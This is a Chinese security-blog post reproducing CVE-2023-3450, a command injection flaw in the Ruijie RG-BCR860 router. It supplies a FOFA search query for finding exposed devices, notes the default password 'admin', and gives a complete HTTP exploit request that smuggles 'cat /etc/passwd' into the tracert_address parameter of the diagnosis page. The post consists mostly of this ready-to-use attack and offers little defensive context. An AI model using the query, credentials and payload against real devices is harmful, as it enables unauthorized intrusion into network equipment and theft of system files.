freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

锐捷__RCE漏洞_CVE-2023-3450漏洞复现
柯达 2024-01-22 14:33:04 210650

0x01 fofa语法

icon_hash="-399311436"

1705904992_65ae0b60a6761f00f0b3b.png!small

0x02 漏洞影响

Ruijie RG-BCR860 2.5.13

0x03 漏洞利用

漏洞属于后台漏洞,需要登录后才能利用

默认密码:admin

1705905007_65ae0b6ff1a74d637359a.png!small

在这个模块可以执行任意命令

1705905063_65ae0ba73a72d81db807e.png!small

0x04 exp

GET /cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://127.0.0.1/cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis
Cookie: sysauth=awsa5241b0651d5fbaac5de8daweq210

# 渗透测试 # web安全 # 漏洞分析 # 网络安全技术 # 漏洞复现
本文为 柯达 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
柯达 LV.4
这家伙太懒了,还未填写个人描述!
  • 8 文章数
  • 3 关注者
万户 ezOFFICE check_onlyfield.jsp SQL注入漏洞
2024-01-23
万户网络-ezOFFICE wf_printnum.jsp SQL注入(1day)
2024-01-22
Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现
2024-01-22